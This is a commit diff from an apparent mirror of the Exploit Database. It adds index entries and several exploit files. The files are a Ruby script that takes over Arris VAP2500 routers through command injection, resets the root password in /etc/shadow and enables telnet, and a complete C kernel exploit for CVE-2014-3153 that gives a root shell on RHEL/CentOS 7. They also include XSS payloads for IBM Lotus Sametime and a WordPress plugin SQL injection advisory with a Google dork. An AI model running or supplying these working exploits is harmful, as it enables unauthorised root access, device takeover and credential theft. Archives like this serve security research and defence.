bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_27_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-27 04:52:09 +00:00
parent cd1ca949ad
commit e88829222c
20 changed files with 1601 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
files.csv
View file

@ -487,7 +487,7 @@ id,file,description,date,author,platform,type,port
631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0
634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0
635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
636,platforms/windows/remote/636.c,"MiniShare Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80
637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
640,platforms/windows/remote/640.c,"MS Windows Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
@ -31806,6 +31806,7 @@ id,file,description,date,author,platform,type,port
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80
35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - '.pcap' File Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0
35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0
35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0
@ -31828,8 +31829,11 @@ id,file,description,date,author,platform,type,port
35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
@ -31842,3 +31846,17 @@ id,file,description,date,author,platform,type,port
35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 Command Injection",2014-11-24,"Core Security",cgi,webapps,80
35358,platforms/php/dos/35358.txt,"PHP 5.5.12 Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0
35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0
35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 'wsnuser' Cookie Parameter SQL Injection Vulnerability",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0
35361,platforms/php/webapps/35361.txt,"Escort Directory CMS SQL Injection Vulnerability",2011-02-19,NoNameMT,php,webapps,0
35362,platforms/php/webapps/35362.txt,"Batavi 1.0 Multiple Local File Include and Cross Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0
35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0
35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0
35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 (dosearch.php, words_exact param) - SQL Injection",2014-11-25,bard,php,webapps,80
35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0
35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS Vulnerability",2014-11-25,"Halil Dalabasmaz",php,webapps,80
35370,platforms/linux/local/35370.c,"Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406",2014-11-25,"Kaiqu Chen",linux,local,0
35371,platforms/php/webapps/35371.txt,"Wordpress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80
35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80
35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 'wpfn' Parameter Cross Site Scripting Vulnerability",2011-02-22,"High-Tech Bridge SA",php,webapps,0
35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 'stcenter.nsf' Cross Site Scripting Vulnerability",2011-02-22,andrew,php,webapps,0
35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0

Can't render this file because it is too large.

49
platforms/hardware/webapps/35372.rb Executable file
View file

@ -0,0 +1,49 @@
#!/usr/bin/env ruby
require 'net/http'
require 'digest/md5'
if !ARGV[0]
puts "Usage: #{$0} <vap2500_ip_address>"
exit(0)
end
host = ARGV[0]
new_pass = "h4x0r3d!"
http = Net::HTTP.new(host).start
users = nil
users = http.request_get("/admin.conf").body.split("\n").map! {|user| user.sub(/^(.*?),.*$/,"\\1")}
if users
puts "[*] found user accounts: #{users.inspect}"
puts "[*] checking for root privs"
else
puts "[!!!] could not find any user accounts. exiting."
exit(-1)
end
root_privs = nil
users.each {|user|
if http.request_post("/tools_command.php","cmb_header=&txt_command=whoami",{"Cookie" => "p=#{Digest::MD5.hexdigest(user)}"}).body =~ /root/
puts "[*] root privs found: #{user}"
root_privs = user
break
end
}
if !root_privs
puts "[!!!] could not find a root priv account. exiting."
exit(-1)
end
puts "[*] modifying root password"
new_hash = new_pass.crypt("$1$#{new_pass}$").gsub("$","\\$")
http.request_post("/tools_command.php","cmb_header=&txt_command=sed -i -r \"s/root:[^:]*:(.*)/root:#{new_hash}:\\1/g\" /etc/shadow",{"Cookie" => "p=#{Digest::MD5.hexdigest(root_privs)}"})
puts "[*] enabling telnet"
if http.request_post("/tools_command.php","cmb_header=&txt_command=rm /mnt/jffs2/telnet-disabled; sh /etc/init.d/S42inetd start",{"Cookie" => "p=#{Digest::MD5.hexdigest(root_privs)}"}).body =~ /Starting inetd/
puts "[*] success! telnet to #{host} (user:root pass:#{new_pass})"
else
puts "[!!!] couldn't start telnet"
end

701
platforms/linux/local/35370.c Executable file
View file

@ -0,0 +1,701 @@
/*
* CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406
* By Kaiqu Chen ( kaiquchen@163.com )
* Based on libfutex and the expoilt for Android by GeoHot.
*
* Usage:
* $gcc exploit.c -o exploit -lpthread
* $./exploit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <pthread.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <linux/futex.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#define ARRAY_SIZE(a) (sizeof (a) / sizeof (*(a)))
#define FUTEX_WAIT_REQUEUE_PI 11
#define FUTEX_CMP_REQUEUE_PI 12
#define USER_PRIO_BASE 120
#define LOCAL_PORT 5551
#define SIGNAL_HACK_KERNEL 12
#define SIGNAL_THREAD_EXIT 10
#define OFFSET_PID 0x4A4
#define OFFSET_REAL_PARENT 0x4B8
#define OFFSET_CRED 0x668
#define SIZEOF_CRED 160
#define SIZEOF_TASK_STRUCT 2912
#define OFFSET_ADDR_LIMIT 0x20
#define PRIO_LIST_OFFSET 8
#define NODE_LIST_OFFSET (PRIO_LIST_OFFSET + sizeof(struct list_head))
#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)
#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)
#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)
#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)
#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))
#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))
////////////////////////////////////////////////////////////////////
struct task_struct;
struct thread_info {
struct task_struct *task;
void *exec_domain;
int flags;
int status;
int cpu;
int preempt_count;
void *addr_limit;
};
struct list_head {
struct list_head *next;
struct list_head *prev;
};
struct plist_head {
struct list_head node_list;
};
struct plist_node {
int prio;
struct list_head prio_list;
struct list_head node_list;
};
struct rt_mutex {
unsigned long wait_lock;
struct plist_head wait_list;
struct task_struct *owner;
};
struct rt_mutex_waiter {
struct plist_node list_entry;
struct plist_node pi_list_entry;
struct task_struct *task;
struct rt_mutex *lock;
};
struct mmsghdr {
struct msghdr msg_hdr;
unsigned int msg_len;
};
struct cred {
int usage;
int uid; /* real UID of the task */
int gid; /* real GID of the task */
int suid; /* saved UID of the task */
int sgid; /* saved GID of the task */
int euid; /* effective UID of the task */
int egid; /* effective GID of the task */
int fsuid; /* UID for VFS ops */
int fsgid; /* GID for VFS ops */
};
////////////////////////////////////////////////////////////////////
static int swag = 0;
static int swag2 = 0;
static int main_pid;
static pid_t waiter_thread_tid;
static pthread_mutex_t hacked_lock;
static pthread_cond_t hacked;
static pthread_mutex_t done_lock;
static pthread_cond_t done;
static pthread_mutex_t is_thread_desched_lock;
static pthread_cond_t is_thread_desched;
static volatile int do_socket_tid_read = 0;
static volatile int did_socket_tid_read = 0;
static volatile int do_dm_tid_read = 0;
static volatile int did_dm_tid_read = 0;
static pid_t last_tid = 0;
static volatile int_sync_time_out = 0;
struct thread_info thinfo;
char task_struct_buf[SIZEOF_TASK_STRUCT];
struct cred cred_buf;
struct thread_info *hack_thread_stack = NULL;
pthread_t thread_client_to_setup_rt_waiter;
int listenfd;
int sockfd;
int clientfd;
////////////////////////////////////////////////////////////////
int gettid()
{
return syscall(__NR_gettid);
}
ssize_t read_pipe(void *kbuf, void *ubuf, size_t count) {
int pipefd[2];
ssize_t len;
pipe(pipefd);
len = write(pipefd[1], kbuf, count);
if (len != count) {
printf("Thread %d failed in reading @ %p : %d %d\n", gettid(), kbuf, (int)len, errno);
while(1) { sleep(10); }
}
read(pipefd[0], ubuf, count);
close(pipefd[0]);
close(pipefd[1]);
return len;
}
ssize_t write_pipe(void *kbuf, void *ubuf, size_t count) {
int pipefd[2];
ssize_t len;
pipe(pipefd);
write(pipefd[1], ubuf, count);
len = read(pipefd[0], kbuf, count);
if (len != count) {
printf("Thread %d failed in writing @ %p : %d %d\n", gettid(), kbuf, (int)len, errno);
while(1) { sleep(10); }
}
close(pipefd[0]);
close(pipefd[1]);
return len;
}
int pthread_cancel_immediately(pthread_t thid)
{
pthread_kill(thid, SIGNAL_THREAD_EXIT);
pthread_join(thid, NULL);
return 0;
}
void set_addr_limit(void *sp)
{
long newlimit = -1;
write_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));
}
void set_cred(struct cred *kcred)
{
struct cred cred_buf;
int len;
len = read_pipe(kcred, &cred_buf, sizeof(cred_buf));
cred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;
cred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;
len = write_pipe(kcred, &cred_buf, sizeof(cred_buf));
}
struct rt_mutex_waiter *pwaiter11;
void set_parent_cred(void *sp, int parent_tid)
{
int len;
int tid;
struct task_struct *pparent;
struct cred *pcred;
set_addr_limit(sp);
len = read_pipe(sp, &thinfo, sizeof(thinfo));
if(len != sizeof(thinfo)) {
printf("Read %p error %d\n", sp, len);
}
void *ptask = thinfo.task;
len = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);
tid = *(int *)(task_struct_buf + OFFSET_PID);
while(tid != 0 && tid != parent_tid) {
pparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT);
len = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);
tid = *(int *)(task_struct_buf + OFFSET_PID);
}
if(tid == parent_tid) {
pcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);
set_cred(pcred);
} else
printf("Pid %d not found\n", parent_tid);
return;
}
static int read_voluntary_ctxt_switches(pid_t pid)
{
char filename[256];
FILE *fp;
int vcscnt = -1;
sprintf(filename, "/proc/self/task/%d/status", pid);
fp = fopen(filename, "rb");
if (fp) {
char filebuf[4096];
char *pdest;
fread(filebuf, 1, sizeof filebuf, fp);
pdest = strstr(filebuf, "voluntary_ctxt_switches");
vcscnt = atoi(pdest + 0x19);
fclose(fp);
}
return vcscnt;
}
static void sync_timeout_task(int sig)
{
int_sync_time_out = 1;
}
static int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)
{
while (*do_request == 0) { }
printf("Press RETURN after one second...");
*did_request = 1;
getchar();
return 0;
}
static int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)
{
struct sigaction act;
int vcscnt;
int_sync_time_out = 0;
act.sa_handler = sync_timeout_task;
sigemptyset(&act.sa_mask);
act.sa_flags = 0;
act.sa_restorer = NULL;
sigaction(SIGALRM, &act, NULL);
alarm(3);
while (*do_request == 0) {
if (int_sync_time_out)
return -1;
}
alarm(0);
vcscnt = read_voluntary_ctxt_switches(pid);
*did_request = 1;
while (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {
usleep(10);
}
return 0;
}
static void sync_with_parent(int volatile *do_request, int volatile *did_request)
{
*do_request = 1;
while (*did_request == 0) { }
}
void fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)
{
struct rt_mutex_waiter *pwaiter6, *pwaiter7;
struct rt_mutex_waiter waiter6, waiter7;
struct rt_mutex mutex;
if(!pmutex)
return;
read_pipe(pmutex, &mutex, sizeof(mutex));
pwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);
if(!pwaiter6)
return;
read_pipe(pwaiter6, &waiter6, sizeof(waiter6));
pwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);
if(!pwaiter7)
return;
read_pipe(pwaiter7, &waiter7, sizeof(waiter7));
waiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;
waiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;
mutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;
waiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;
write_pipe(pmutex, &mutex, sizeof(mutex));
write_pipe(pwaiter6, &waiter6, sizeof(waiter6));
write_pipe(pwaiter7, &waiter7, sizeof(waiter7));
}
static void void_handler(int signum)
{
pthread_exit(0);
}
static void kernel_hack_task(int signum)
{
struct rt_mutex *prt_mutex, rt_mutex;
struct rt_mutex_waiter rt_waiter11;
int tid = syscall(__NR_gettid);
int pid = getpid();
set_parent_cred(hack_thread_stack, main_pid);
read_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));
prt_mutex = rt_waiter11.lock;
read_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));
void *ptask_struct = rt_mutex.owner;
ptask_struct = (void *)((long)ptask_struct & ~ 0xF);
int len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);
int *ppid = (int *)(task_struct_buf + OFFSET_PID);
void **pstack = (void **)&task_struct_buf[8];
void *owner_sp = *pstack;
set_addr_limit(owner_sp);
pthread_mutex_lock(&hacked_lock);
pthread_cond_signal(&hacked);
pthread_mutex_unlock(&hacked_lock);
}
static void *call_futex_lock_pi_with_priority(void *arg)
{
int prio;
struct sigaction act;
int ret;
prio = (long)arg;
last_tid = syscall(__NR_gettid);
pthread_mutex_lock(&is_thread_desched_lock);
pthread_cond_signal(&is_thread_desched);
act.sa_handler = void_handler;
sigemptyset(&act.sa_mask);
act.sa_flags = 0;
act.sa_restorer = NULL;
sigaction(SIGNAL_THREAD_EXIT, &act, NULL);
act.sa_handler = kernel_hack_task;
sigemptyset(&act.sa_mask);
act.sa_flags = 0;
act.sa_restorer = NULL;
sigaction(SIGNAL_HACK_KERNEL, &act, NULL);
setpriority(PRIO_PROCESS, 0, prio);
pthread_mutex_unlock(&is_thread_desched_lock);
sync_with_parent(&do_dm_tid_read, &did_dm_tid_read);
ret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);
return NULL;
}
static pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)
{
pthread_t th4;
pid_t pid;
do_dm_tid_read = 0;
did_dm_tid_read = 0;
pthread_mutex_lock(&is_thread_desched_lock);
pthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);
pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);
pid = last_tid;
sync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);
pthread_mutex_unlock(&is_thread_desched_lock);
return th4;
}
static int server_for_setup_rt_waiter(void)
{
int sockfd;
int yes = 1;
struct sockaddr_in addr = {0};
sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));
addr.sin_family = AF_INET;
addr.sin_port = htons(LOCAL_PORT);
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));
listen(sockfd, 1);
listenfd = sockfd;
return accept(sockfd, NULL, NULL);
}
static int connect_server_socket(void)
{
int sockfd;
struct sockaddr_in addr = {0};
int ret;
int sock_buf_size;
sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
if (sockfd < 0) {
printf("socket failed\n");
usleep(10);
} else {
addr.sin_family = AF_INET;
addr.sin_port = htons(LOCAL_PORT);
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
}
while (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {
usleep(10);
}
sock_buf_size = 1;
setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));
return sockfd;
}
unsigned long iov_base0, iov_basex;
size_t iov_len0, iov_lenx;
static void *client_to_setup_rt_waiter(void *waiter_plist)
{
int sockfd;
struct mmsghdr msgvec[1];
struct iovec msg_iov[8];
unsigned long databuf[0x20];
int i;
int ret;
struct sigaction act;
act.sa_handler = void_handler;
sigemptyset(&act.sa_mask);
act.sa_flags = 0;
act.sa_restorer = NULL;
sigaction(SIGNAL_THREAD_EXIT, &act, NULL);
waiter_thread_tid = syscall(__NR_gettid);
setpriority(PRIO_PROCESS, 0, 12);
sockfd = connect_server_socket();
clientfd = sockfd;
for (i = 0; i < ARRAY_SIZE(databuf); i++) {
databuf[i] = (unsigned long)waiter_plist;
}
for (i = 0; i < ARRAY_SIZE(msg_iov); i++) {
msg_iov[i].iov_base = waiter_plist;
msg_iov[i].iov_len = (long)waiter_plist;
}
msg_iov[1].iov_base = (void *)iov_base0;
msgvec[0].msg_hdr.msg_name = databuf;
msgvec[0].msg_hdr.msg_namelen = sizeof databuf;
msgvec[0].msg_hdr.msg_iov = msg_iov;
msgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);
msgvec[0].msg_hdr.msg_control = databuf;
msgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);
msgvec[0].msg_hdr.msg_flags = 0;
msgvec[0].msg_len = 0;
syscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0);
sync_with_parent(&do_socket_tid_read, &did_socket_tid_read);
ret = 0;
while (1) {
ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);
if (ret <= 0) {
break;
} else
printf("sendmmsg ret %d\n", ret);
}
return NULL;
}
static void plist_set_next(struct list_head *node, struct list_head *head)
{
node->next = head;
head->prev = node;
node->prev = head;
head->next = node;
}
static void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)
{
rt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;
rt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;
plist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);
plist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);
}
static bool do_exploit(void *waiter_plist)
{
void *magicval, *magicval2;
struct rt_mutex_waiter *rt_waiters;
pid_t pid;
pid_t pid6, pid7, pid12, pid11;
rt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);
syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);
while (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {
usleep(10);
}
pthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);
pthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);
swag2 = 0;
do_socket_tid_read = 0;
did_socket_tid_read = 0;
syscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);
if (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {
return false;
}
setup_waiter_params(rt_waiters);
magicval = rt_waiters[0].list_entry.prio_list.next;
printf("Checking whether exploitable..");
pthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);
if (rt_waiters[0].list_entry.prio_list.next == magicval) {
printf("failed\n");
return false;
}
printf("OK\nSeaching good magic...\n");
magicval = rt_waiters[0].list_entry.prio_list.next;
pthread_cancel_immediately(th11);
pthread_t th11_1, th11_2;
while(1) {
setup_waiter_params(rt_waiters);
th11_1 = create_thread_do_futex_lock_pi_with_priority(11);
magicval = rt_waiters[0].list_entry.prio_list.next;
hack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);
rt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;
th11_2 = create_thread_do_futex_lock_pi_with_priority(11);
magicval2 = rt_waiters[1].list_entry.node_list.prev;
printf("magic1=%p magic2=%p\n", magicval, magicval2);
if(magicval < magicval2) {
printf("Good magic found\nHacking...\n");
break;
} else {
pthread_cancel_immediately(th11_1);
pthread_cancel_immediately(th11_2);
}
}
pwaiter11 = NODE_LIST_TO_WAITER(magicval2);
pthread_mutex_lock(&hacked_lock);
pthread_kill(th11_1, SIGNAL_HACK_KERNEL);
pthread_cond_wait(&hacked, &hacked_lock);
pthread_mutex_unlock(&hacked_lock);
close(listenfd);
struct rt_mutex_waiter waiter11;
struct rt_mutex *pmutex;
int len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));
if(len != sizeof(waiter11)) {
pmutex = NULL;
} else {
pmutex = waiter11.lock;
}
fix_rt_mutex_waiter_list(pmutex);
pthread_cancel_immediately(th11_1);
pthread_cancel_immediately(th11_2);
pthread_cancel_immediately(th7);
pthread_cancel_immediately(th6);
close(clientfd);
pthread_cancel_immediately(thread_client_to_setup_rt_waiter);
exit(0);
}
#define MMAP_ADDR_BASE 0x0c000000
#define MMAP_LEN 0x0c001000
int main(int argc, char *argv[])
{
unsigned long mapped_address;
void *waiter_plist;
printf("CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\n");
main_pid = gettid();
if(fork() == 0) {
iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (iov_base0 < 0xb0000000) {
printf("mmap failed?\n");
return 1;
}
iov_len0 = 0x10000;
iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (iov_basex < MMAP_ADDR_BASE) {
printf("mmap failed?\n");
return 1;
}
iov_lenx = MMAP_LEN;
waiter_plist = (void *)iov_basex + 0x400;
pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);
sockfd = server_for_setup_rt_waiter();
if (sockfd < 0) {
printf("Server failed\n");
return 1;
}
if (!do_exploit(waiter_plist)) {
return 1;
}
return 0;
}
while(getuid())
usleep(100);
execl("/bin/bash", "bin/bash", NULL);
return 0;
}

9
platforms/multiple/remote/35364.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46471/info
IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
IBM Lotus Sametime 8.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/stconf.nsf/WebMessage?OpenView&messageString=";><script>alert("XSS!")</script>#

9
platforms/multiple/remote/35366.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46471/info
IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
IBM Lotus Sametime 8.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/stconf.nsf/";);} alert("XSS!"); function a(){ var a=unescape("

139
platforms/php/webapps/35313.txt Executable file
View file

@ -0,0 +1,139 @@
Vulnerability title: Multi SQL Injection in SP Client Document Manager plugin
CVE: N/A
Vendor: http://smartypantsplugins.com
Plugin: SP Client Document Manager
Download link: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Fixed version: N/A
Reported by: Dang Quoc Thai - thai.q.dang@itas.vn - Credits to ITAS Team - www.itas.vn
Timeline: + 10/30/2014: Notify to vendor - vendor does not response
+ 11/08/2014: Notify to vendor - Vendor blocks IPs from Viet Nam
+ 11/05/2014: Notify to vendor - vendor does not response
+ 11/20/2014: Public information
Details:
The Blind SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from blind SQL injection:
Link 1:
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://server/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
vendor_email[]=<SQL Injection>
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
